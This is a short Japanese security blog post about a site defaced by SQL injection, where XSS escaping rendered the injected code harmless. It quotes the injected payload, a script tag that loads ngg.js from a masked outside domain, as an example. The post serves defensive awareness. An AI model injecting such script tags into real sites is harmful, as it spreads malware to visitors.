SQLインジェクションにより改ざんされたがXSS対策はとられていた

うわさのngg.jsを調べていたらこんな表示のサイトを見かけました。




HTMLソースは以下の通り

宮城県福島県山形県岩手県秋田県<script src=http://www.XXXXXX.com/ngg.js></script>

おそらく、SQLインジェクションによりSCRIPT要素を埋め込まれたものの、XSS対策がとられていたので、JavaScriptの実行はされない状態で表示されているのだと思います。
第5回 クロスサイト・スクリプティング対策も忘れずに | 日経 xTECH(クロステック)で書いたように、SQLインジェクションによるマルウェア埋め込み対策として、XSS対策も怠らないようにと書いたばかりですが、(たまたまでしょうが)それを実証するような画面を見かけましたので報告します。
なお、改ざんされたサイトはIPA経由で届け出ました。